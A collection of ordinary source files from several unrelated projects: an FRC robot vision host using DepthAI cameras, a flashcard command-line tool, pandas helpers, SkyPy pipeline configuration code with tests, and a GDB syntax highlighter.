self.parse_intake_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_intake_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_intake_frame(frame, edgeFrame, bboxes)
for i, bbox in enumerate(bboxes):
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
frame_color = (0, 255, 0) if i == 0 else (0, 150, 150)
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), frame_color, 2)
cv2.putText(frame, "x: {}".format(round(bbox['x_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "size: {}".format(round(bbox['size'], 3)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Intake Edge", edgeFrame)
cv2.imshow("OAK-1 Intake", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting intake-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
```
#### File: depthai-frc/localization-host/depthai_utils.py
```python
import uuid
from pathlib import Path
import cv2
import depthai as dai
import numpy as np
from common.config import *
from imutils.video import FPS
from common.feature_tracker import FeatureTrackerDebug, FeatureTracker, matchStereoToRefImage, calculateRotationMask
from common.image_processing import SIFT_PARAMS, drawSolvePNP
log = logging.getLogger(__name__)
LABELS = []
def create_pipeline(model_name):
global pipeline
global LABELS
global disparityMultiplier
log.info("Creating DepthAI pipeline...")
# out_depth = False # Disparity by default
# out_rectified = True # Output and display rectified streams
# lrcheck = True # Better handling for occlusions
# extended = False # Closer-in minimum depth, disparity range is doubled
# subpixel = True # Better accuracy for longer distance, fractional disparity 32-levels
# # Options: MEDIAN_OFF, KERNEL_3x3, KERNEL_5x5, KERNEL_7x7
median = dai.StereoDepthProperties.MedianFilter.KERNEL_7x7
pipeline = dai.Pipeline()
pipeline.setOpenVINOVersion(dai.OpenVINO.Version.VERSION_2021_2)
# Define sources and outputs
camRgb = pipeline.createColorCamera()
spatialDetectionNetwork = pipeline.createYoloSpatialDetectionNetwork()
monoLeft = pipeline.createMonoCamera()
monoRight = pipeline.createMonoCamera()
featureTrackerLeft = pipeline.createFeatureTracker()
featureTrackerRight = pipeline.createFeatureTracker()
stereo = pipeline.createStereoDepth()
xoutRgb = pipeline.createXLinkOut()
camRgb.preview.link(xoutRgb.input)
xoutNN = pipeline.createXLinkOut()
xoutPassthroughFrameLeft = pipeline.createXLinkOut()
xoutTrackedFeaturesLeft = pipeline.createXLinkOut()
xoutPassthroughFrameRight = pipeline.createXLinkOut()
xoutTrackedFeaturesRight = pipeline.createXLinkOut()
xinTrackedFeaturesConfig = pipeline.createXLinkIn()
# Properties
camRgb.setPreviewSize(NN_IMG_SIZE, NN_IMG_SIZE)
camRgb.setResolution(dai.ColorCameraProperties.SensorResolution.THE_1080_P)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.BGR)
xoutPassthroughFrameLeft.setStreamName("passthroughFrameLeft")
xoutTrackedFeaturesLeft.setStreamName("trackedFeaturesLeft")
xoutPassthroughFrameRight.setStreamName("passthroughFrameRight")
xoutTrackedFeaturesRight.setStreamName("trackedFeaturesRight")
xinTrackedFeaturesConfig.setStreamName("trackedFeaturesConfig")
monoLeft.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
monoLeft.setBoardSocket(dai.CameraBoardSocket.LEFT)
monoRight.setResolution(dai.MonoCameraProperties.SensorResolution.THE_720_P)
monoRight.setBoardSocket(dai.CameraBoardSocket.RIGHT)
# Setting node configs
# stereo.setOutputDepth(out_depth)
# stereo.setOutputRectified(out_rectified)
stereo.setConfidenceThreshold(255)
stereo.setRectifyEdgeFillColor(0) # Black, to better see the cutout
stereo.setMedianFilter(median) # KERNEL_7x7 default
# stereo.setLeftRightCheck(lrcheck)
# stereo.setExtendedDisparity(extended)
# stereo.setSubpixel(subpixel)
model_dir = Path(__file__).parent.parent / Path(f"resources/nn/") / model_name
blob_path = model_dir / Path(model_name).with_suffix(f".blob")
config_path = model_dir / Path(model_name).with_suffix(f".json")
nn_config = NNConfig(config_path)
LABELS = nn_config.labels
spatialDetectionNetwork.setBlobPath(str(blob_path))
spatialDetectionNetwork.setConfidenceThreshold(nn_config.confidence)
spatialDetectionNetwork.setNumClasses(nn_config.metadata["classes"])
spatialDetectionNetwork.setCoordinateSize(nn_config.metadata["coordinates"])
spatialDetectionNetwork.setAnchors(nn_config.metadata["anchors"])
spatialDetectionNetwork.setAnchorMasks(nn_config.metadata["anchor_masks"])
spatialDetectionNetwork.setIouThreshold(nn_config.metadata["iou_threshold"])
spatialDetectionNetwork.input.setBlocking(False)
spatialDetectionNetwork.setBoundingBoxScaleFactor(0.5)
spatialDetectionNetwork.setDepthLowerThreshold(100)
spatialDetectionNetwork.setDepthUpperThreshold(50000)
xoutRgb.setStreamName("rgb")
xoutNN.setStreamName("detections")
# Linking
monoLeft.out.link(stereo.left)
monoRight.out.link(stereo.right)
monoLeft.out.link(featureTrackerLeft.inputImage)
featureTrackerLeft.passthroughInputImage.link(xoutPassthroughFrameLeft.input)
featureTrackerLeft.outputFeatures.link(xoutTrackedFeaturesLeft.input)
xinTrackedFeaturesConfig.out.link(featureTrackerLeft.inputConfig)
monoRight.out.link(featureTrackerRight.inputImage)
featureTrackerRight.passthroughInputImage.link(xoutPassthroughFrameRight.input)
featureTrackerRight.outputFeatures.link(xoutTrackedFeaturesRight.input)
xinTrackedFeaturesConfig.out.link(featureTrackerRight.inputConfig)
numShaves = 2
numMemorySlices = 2
featureTrackerLeft.setHardwareResources(numShaves, numMemorySlices)
featureTrackerRight.setHardwareResources(numShaves, numMemorySlices)
featureTrackerConfig = featureTrackerRight.initialConfig.get()
camRgb.preview.link(spatialDetectionNetwork.input)
spatialDetectionNetwork.out.link(xoutNN.input)
stereo.depth.link(spatialDetectionNetwork.inputDepth)
log.info("Pipeline created.")
return pipeline, LABELS
def capture():
with dai.Device(pipeline) as device:
previewQueue = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
detectionNNQueue = device.getOutputQueue(name="detections", maxSize=4, blocking=False)
passthroughImageLeftQueue = device.getOutputQueue("passthroughFrameLeft", 8, False)
outputFeaturesLeftQueue = device.getOutputQueue("trackedFeaturesLeft", 8, False)
passthroughImageRightQueue = device.getOutputQueue("passthroughFrameRight", 8, False)
outputFeaturesRightQueue = device.getOutputQueue("trackedFeaturesRight", 8, False)
if DEBUG:
leftFeatureTracker = FeatureTrackerDebug("Feature tracking duration (frames)", "Left")
rightFeatureTracker = FeatureTrackerDebug("Feature tracking duration (frames)", "Right")
else:
leftFeatureTracker = FeatureTracker()
rightFeatureTracker = FeatureTracker()
while True:
results = {}
frame = previewQueue.get().getCvFrame()
inDet = detectionNNQueue.tryGet()
detections = []
if inDet is not None:
detections = inDet.detections
bboxes = []
height = frame.shape[0]
width = frame.shape[1]
for detection in detections:
if LABELS[detection.label] == 'power_cell':
continue
data = {
'id': uuid.uuid4(),
'label': detection.label,
'confidence': detection.confidence,
'x_min': int(detection.xmin * width),
'x_max': int(detection.xmax * width),
'y_min': int(detection.ymin * height),
'y_max': int(detection.ymax * height),
'depth_x': detection.spatialCoordinates.x / 1000,
'depth_y': detection.spatialCoordinates.y / 1000,
'depth_z': detection.spatialCoordinates.z / 1000,
}
bboxes.append(data)
if DEBUG:
cv2.rectangle(frame, (data['x_min'], data['y_min']), (data['x_max'], data['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(data['depth_x'], 2)), (data['x_min'], data['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(data['depth_y'], 2)), (data['x_min'], data['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "z: {}".format(round(data['depth_z'], 2)), (data['x_min'], data['y_min'] + 70), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(data['confidence'], 2)), (data['x_min'], data['y_min'] + 90), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(LABELS[data['label']], 1), (data['x_min'], data['y_min'] + 110), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
target_sift_params = SIFT_PARAMS[LABELS[data['label']]]
inPassthroughFrameLeft = passthroughImageLeftQueue.get()
passthroughFrameLeft = inPassthroughFrameLeft.getFrame()
leftFrame = cv2.cvtColor(passthroughFrameLeft, cv2.COLOR_GRAY2BGR)
inPassthroughFrameRight = passthroughImageRightQueue.get()
passthroughFrameRight = inPassthroughFrameRight.getFrame()
rightFrame = cv2.cvtColor(passthroughFrameRight, cv2.COLOR_GRAY2BGR)
trackedFeaturesLeft = outputFeaturesLeftQueue.get().trackedFeatures
leftFeatureTracker.trackFeaturePath(trackedFeaturesLeft)
trackedFeaturesRight = outputFeaturesRightQueue.get().trackedFeatures
rightFeatureTracker.trackFeaturePath(trackedFeaturesRight)
featuredata = {}
if any(trackedFeaturesLeft) and any(trackedFeaturesRight):
ref_good_matches, left_keypoints, left_filtered_keypoints, right_filtered_keypoints = matchStereoToRefImage(trackedFeaturesLeft, leftFrame, trackedFeaturesRight, rightFrame, target_sift_params["descriptors"])
featuredata[data['id']] = {
'frame': leftFrame,
'good_matches': ref_good_matches,
'left_keypoints': left_filtered_keypoints,
'right_keypoints': right_filtered_keypoints
}
results['featuredata'] = featuredata
if DEBUG:
if any(ref_good_matches):
src_pts = np.float32([target_sift_params['keypoints'][m.queryIdx].pt for m in ref_good_matches]).reshape(-1, 1, 2)
dst_pts = np.float32([left_keypoints[m.trainIdx].pt for m in ref_good_matches]).reshape(-1, 1, 2)
if len(src_pts) >= 4 and len(dst_pts) >=4:
try:
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
matchesMask = mask.ravel().tolist()
draw_params = dict(matchColor=(0, 255, 0), # draw matches in green color
singlePointColor=None,
matchesMask=matchesMask, # draw only inliers
flags=2)
h, w, d = target_sift_params['image'].shape
pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
dst = cv2.perspectiveTransform(pts, M)
img2 = cv2.polylines(leftFrame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
img3 = cv2.drawMatches(target_sift_params['image'], target_sift_params['keypoints'], img2, left_keypoints,
ref_good_matches, None, **draw_params)
cv2.imshow("Ransac", img3)
except Exception as e:
pass
results['frame'] = frame
results['bboxes'] = bboxes
yield results
def get_pipeline():
return pipeline
def del_pipeline():
del pipeline
```
#### File: depthai-frc/object-detection-host/main.py
```python
import argparse
import threading
from time import sleep
import cv2
import depthai as dai
import socket
from common import target_finder
from common.config import NN_IMG_SIZE
from pipelines import object_tracker_detection, object_edge_detection
import logging
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 4201
port2 = 4202
self.device_list = {"OAK-1": {
'name': "OAK-1",
'id': "14442C10C14F47D700",
# 'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-1")
}, "OAK-2": {
'name': "OAK-2",
# 'id': "14442C10C14F47D700",
'id': "14442C1011043ED700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-2")
}}
self.goal_pipeline, self.goal_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.object_pipeline, self.object_labels = object_tracker_detection.create_pipeline("infiniteRecharge2021")
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW')
self.oak_2_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-1']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
angle_offset = ((NN_IMG_SIZE / 2.0) - target_x) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128), thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-1']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_object_frame(self, frame, bboxes):
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-2']['nt_tab']
power_cell_counter = 0
for bbox in bboxes:
target_label = self.object_labels[bbox['label']]
if target_label not in valid_labels:
continue
power_cell_counter += 1
box_color = (0, 150, 150)
if power_cell_counter >= 5:
box_color = (0, 255, 0)
elif power_cell_counter < 3:
box_color = (0, 0, 255)
for bbox in bboxes:
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), box_color, 2)
nt_tab.putNumber("powercells", power_cell_counter)
nt_tab.putBoolean("indexer_full", power_cell_counter >= 5)
fps = self.device_list['OAK-2']['fps_handler']
fps.next_iter()
cv2.putText(frame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_2_stream.send_frame(frame)
return frame, bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-1']['id'])
self.device_list['OAK-1']['nt_tab'].putBoolean("OAK-1 Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-2']['id'])
self.device_list['OAK-2']['nt_tab'].putBoolean("OAK-2 Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_object_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-1 Stream", self.device_list['OAK-1']['stream_address'])
for frame, edgeFrame, bboxes in object_edge_detection.capture(device_info):
self.parse_goal_frame(frame, edgeFrame, bboxes)
def run_object_detection(self, device_info):
self.device_list['OAK-1']['nt_tab'].putString("OAK-2 Stream", self.device_list['OAK-2']['stream_address'])
for frame, bboxes in object_tracker_detection.capture(device_info):
self.parse_object_frame(frame, bboxes)
class MainDebug(Main):
def __init__(self):
super().__init__()
def parse_goal_frame(self, frame, edgeFrame, bboxes):
frame, edgeFrame, bboxes = super().parse_goal_frame(frame, edgeFrame, bboxes)
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
if 'target_x' not in bbox:
continue
target_x = bbox['target_x'] if 'target_x' in bbox else 0
angle_offset = bbox['angle_offset'] if 'angle_offset' in bbox else 0
cv2.rectangle(frame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (0, 255, 0), 2)
cv2.putText(frame, "x: {}".format(round(target_x, 2)), (bbox['x_min'], bbox['y_min'] + 30),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "y: {}".format(round(bbox['y_mid'], 2)), (bbox['x_min'], bbox['y_min'] + 50),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "angle: {}".format(round(angle_offset, 3)), (bbox['x_min'], bbox['y_min'] + 70),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "conf: {}".format(round(bbox['confidence'], 2)), (bbox['x_min'], bbox['y_min'] + 90),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "label: {}".format(self.goal_labels[bbox['label']], 1), (bbox['x_min'], bbox['y_min'] + 110),
cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Edge", edgeFrame)
cv2.imshow("OAK-1", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
def parse_object_frame(self, frame, bboxes):
frame, bboxes = super().parse_object_frame(frame, bboxes)
for bbox in bboxes:
cv2.putText(frame, "id: {}".format(bbox['id']), (bbox['x_min'], bbox['y_min'] + 30), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.putText(frame, "status: {}".format(bbox['status']), (bbox['x_min'], bbox['y_min'] + 50), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
cv2.imshow("OAK-1 Objects", frame)
key = cv2.waitKey(1)
if key == ord("q"):
raise StopIteration()
if __name__ == '__main__':
log.info("Starting object-detection-host")
if args.debug:
MainDebug().run()
else:
Main().run()
``` |
{
"source": "jonathandasilvasantos/2020-benkyo-cli-flashcards",
"score": 2
} |
#### File: benkyo/commands/add.py
```python
import click
import os
from ..model.card import Card
from ..utils.validate import assert_repository_is_avaliable
from ..utils.config import read_config
from subprocess import call
import sys
@click.command()
@click.option('--front', '-f', prompt='Frontal Face', help='Frontal Face of the new card.', required=True)
@click.option('--hidden', '-hf', prompt='Hidden Face', help='Hidden face of the new card.', required=True)
@click.option('--tag', '-t', default='default', prompt='TAG', help='TAG of the new card.', required=False)
@click.option('--count', '-c', required=False, type=click.INT, default=1, help='How many entries. Set -1 to add entries withou a prefedined limit.')
def add(front, hidden, tag, count):
assert_repository_is_avaliable()
card = Card()
card.frontal = front
card.hidden = hidden
card.tag = tag
card.save()
if (count > 1) or (count < 0):
if count < 0:
click.confirm('Do you want to continue?', abort=True)
cmdline = ['benkyo', 'add', '-c', str(count-1) ]
call(cmdline)
```
#### File: benkyo/commands/remove.py
```python
import click
from ..model.card import Card
import peewee
@click.command()
@click.argument('removeall', default='', type=click.STRING, required=False)
@click.option('--cardid', '-id', type=click.INT, default=-1, help='Specify a card to be removed')
@click.option('--tag', '-t', type=click.STRING, default='', help='Remove all cards of a TAG')
def remove(removeall, cardid, tag):
all = False
if removeall == 'all': all = True
if (cardid == -1) and (len(tag) < 1) and (all == False):
click.echo("Ops! You need to specify a card id or a tag to execute this command!")
exit(1)
query = ''
if cardid != -1:
query = Card.delete().where(Card.id == cardid)
if len(tag) > 0:
query = Card.delete().where(Card.tag == tag)
if all:
click.confirm('Are you sure that you want to remove all cards?', abort=True)
query = Card.delete()
result = query.execute()
click.echo(str(result) + ' card(s) removed.')
```
#### File: view/model/uicarddata.py
```python
class UICardData:
id = -1
frontal = ''
hidden = ''
tag = ''
def __init__(self, id, frontal, hidden, tag):
self.id = id
self.frontal = frontal
self.hidden = hidden
self.tag = tag
# Backup values to restore during an editing canceled process
self._frontal = frontal
self._hidden = hidden
self._tag = tag
``` |
{
"source": "Jonathan-DataScience/lambdata",
"score": 3
} |
#### File: lambdata/lambdata/helper_functions.py
```python
import pandas as pd
import numpy as np
class CleaningDatabase(pd.DataFrame):
def null_count(self):
df2 = self.isnull().sum()
dfsum = df2.sum()
return dfsum
def list_2_series(list,df):
df2 = df[pd.Series(list)]
return df2
```
#### File: lambdata/lambdata/__init__.py
```python
import pandas as pd
import numpy as np
def df_cleanser(df):
"""Cleans pd.DataFrame"""
# TODO - Implement
pass
``` |
{
"source": "JonathanDHarris/skypy",
"score": 2
} |
#### File: skypy/pipeline/_config.py
```python
import builtins
from importlib import import_module
import yaml
__all__ = [
'load_skypy_yaml',
]
def import_function(qualname):
'''load function from fully qualified name'''
path = qualname.split('.')
module = builtins
for i, key in enumerate(path[:-1]):
if not hasattr(module, key):
module = import_module('.'.join(path[:i+1]))
else:
module = getattr(module, key)
function = getattr(module, path[-1])
return function
class SkyPyLoader(yaml.SafeLoader):
'''custom YAML loader class with SkyPy extensions'''
@classmethod
def load(cls, stream):
'''load the first YAML document from stream'''
loader = cls(stream)
try:
return loader.get_single_data()
finally:
loader.dispose()
def construct_function(self, name, node):
'''load function from !function tag
tags are stored as a tuple `(function, args)`
'''
if isinstance(node, yaml.ScalarNode):
args = self.construct_scalar(node)
elif isinstance(node, yaml.SequenceNode):
args = self.construct_sequence(node)
elif isinstance(node, yaml.MappingNode):
args = self.construct_mapping(node)
try:
function = import_function(name)
except (ModuleNotFoundError, AttributeError) as e:
raise ImportError(f'{e}\n{node.start_mark}') from e
return (function,) if args == '' else (function, args)
# constructor for generic functions
SkyPyLoader.add_multi_constructor('!', SkyPyLoader.construct_function)
def load_skypy_yaml(filename):
'''Read a SkyPy pipeline configuration from a YAML file.
Parameters
----------
filename : str
The name of the configuration file.
'''
# read the YAML file
with open(filename, 'r') as stream:
return SkyPyLoader.load(stream) or {}
```
#### File: pipeline/tests/test_config.py
```python
from astropy.utils.data import get_pkg_data_filename
from collections.abc import Callable
import pytest
from skypy.pipeline import load_skypy_yaml
def test_load_skypy_yaml():
# Read empty config file
filename = get_pkg_data_filename('data/empty_config.yml')
assert load_skypy_yaml(filename) == {}
# Read config file and check entries are parsed to the correct types
filename = get_pkg_data_filename('data/test_config.yml')
config = load_skypy_yaml(filename)
assert isinstance(config['test_int'], int)
assert isinstance(config['test_float'], float)
assert isinstance(config['test_str'], str)
assert isinstance(config['test_func'], tuple)
assert isinstance(config['test_cosmology'][0], Callable)
assert isinstance(config['test_cosmology'][1], dict)
assert isinstance(config['tables']['test_table_1']['test_column_3'][0], Callable)
assert isinstance(config['tables']['test_table_1']['test_column_3'][1], list)
# Bad function
filename = get_pkg_data_filename('data/bad_function.yml')
with pytest.raises(ImportError):
load_skypy_yaml(filename)
# Bad module
filename = get_pkg_data_filename('data/bad_module.yml')
with pytest.raises(ImportError):
load_skypy_yaml(filename)
```
#### File: power_spectrum/tests/test_camb.py
```python
import numpy as np
from astropy.cosmology import Planck15
from astropy.units import allclose
from astropy.utils.data import get_pkg_data_filename
import pytest
# load the external camb result to test against
camb_result_filename = get_pkg_data_filename('data/camb_result.txt')
test_pzk = np.loadtxt(camb_result_filename)
# try to import the requirement, if it doesn't exist, skip test
try:
__import__('camb')
except ImportError:
CAMB_NOT_FOUND = True
else:
CAMB_NOT_FOUND = False
@pytest.mark.skipif(CAMB_NOT_FOUND, reason='CAMB not found')
def test_camb():
'''
Test a default astropy cosmology
'''
from skypy.power_spectrum import camb
# test shape and compare with the mocked power spectrum
redshift = [0.0, 1.0]
wavenumber = np.logspace(-4.0, np.log10(2.0), 200)
pzk = camb(wavenumber, redshift, Planck15, 2.e-9, 0.965)
assert pzk.shape == (len(redshift), len(wavenumber))
assert allclose(pzk, test_pzk, rtol=1.e-4)
# also check redshifts are ordered correctly
redshift = [1.0, 0.0]
pzk = camb(wavenumber, redshift, Planck15, 2.e-9, 0.965)
assert pzk.shape == (len(redshift), len(wavenumber))
assert allclose(pzk, test_pzk[np.argsort(redshift), :], rtol=1.e-4)
``` |
{
"source": "jonathanding/gef",
"score": 2
} |
#### File: gef/color/message.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from color import generateColorFunction
def on(msg):
return generateColorFunction('green')(msg)
def off(msg):
return generateColorFunction('red')(msg)
def notice(msg):
return generateColorFunction('purple')(msg)
def hint(msg):
return generateColorFunction('yellow')(msg)
def success(msg):
return generateColorFunction('green')(msg)
def warn(msg):
return generateColorFunction('yellow')(msg)
def error(msg):
return generateColorFunction('red')(msg)
def system(msg):
return generateColorFunction('light-red')(msg)
def exit(msg):
return generateColorFunction('red')(msg)
def breakpoint(msg):
return generateColorFunction('yellow')(msg)
def signal(msg):
return generateColorFunction('bold,red')(msg)
def prompt(msg):
return generateColorFunction('bold,red')(msg)
```
#### File: jonathanding/gef/highlighter.py
```python
import re
from functools import lru_cache
import color.syntax_highlight as HH
@lru_cache(maxsize=256)
def highlight_file(filename):
# Notice that the code is cached
with open(filename, encoding='utf-8') as f:
source = f.read()
raw_lines = source.splitlines()
source = HH.syntax_highlight(source, filename)
source_lines = source.splitlines()
return [line.rstrip() for line in source_lines], [line.rstrip() for line in raw_lines]
def highlight_asm(code):
return HH.syntax_highlight(code, filename=".asm")
def highlight_source_code(source, fpath, with_line_number=True):
return HH.syntax_highlight(source, fpath)
if not with_line_number:
return HH.syntax_highlight(source, fpath)
lines = source.splitlines()
line_numbers = []
for i, l in enumerate(lines):
num = re.findall(r'^\s*[0-9]+\s', l)
if num:
line_numbers.append(num[0])
lines[i] = l[len(num[0]):]
else:
line_numbers.append('')
lines = HH.syntax_highlight('\n'.join(lines), fpath).splitlines()
return '\n'.join([a + b for a, b in zip(line_numbers, lines)])
class FormatInst():
def __init__(self, line):
self.line = line
self.is_inst = False
self.header = ''
self.op = ''
self.operands = ''
self.is_inst = self.parse()
if self.is_inst:
self.normalize_operands()
def parse(self):
# => 0x00007ffff6d7cf4c <+12>: movabs rax,0xaaaaaaaaaaaaaaaa
if not re.findall(r'0x[0-9a-f]+.*:', self.line):
return False
parts = re.split(r'(>:\s+)', self.line)
if len(parts) < 3:
return False
self.header = parts[0] + parts[1]
parts = "".join(parts[2:]).split()
self.op = parts[0]
if len(parts) > 1:
self.operands = " ".join(parts[1:])
return True
def normalize_operands(self):
s = self.operands
# pygment doesn't recognize "QWORD PTR" etc., need to be "qword ptr"
s = " ".join([x.lower() if x.isupper() else x for x in s.split()])
# pygment cannot colorify the 0x10 in "rbp-0x10", need to be "rbp - 0x10"
s = re.sub(r'([^-+*/])(\+|-|\*|/)([^-+*/])', r'\1 \2 \3', s)
# reduce the spaces before the comment started with #
s = re.sub(r'\s+(#.*)', r' \1', s)
self.operands = s
def highlighted_str(self):
if not self.is_inst:
return self.line
code = "{:6s} {:s}".format(self.op, self.operands)
# highlight and replace the color <..>
# remove the spaces in <..>
parts = re.split(r'(<.*>)', code)
for i, p in enumerate(parts):
if p.startswith('<') and p.endswith('>'):
parts[i] = "".join(p.split())
code = "".join(parts)
highlighted_code = highlight_asm(code)
# then replace the <> with our format
raw_parts = code.split()
parts = highlighted_code.split()
for i, p in enumerate(raw_parts):
if p.startswith('<') and p.endswith('>'):
parts[i] = '\033[35m' + p + '\033[0m' # pink
# op need aligned
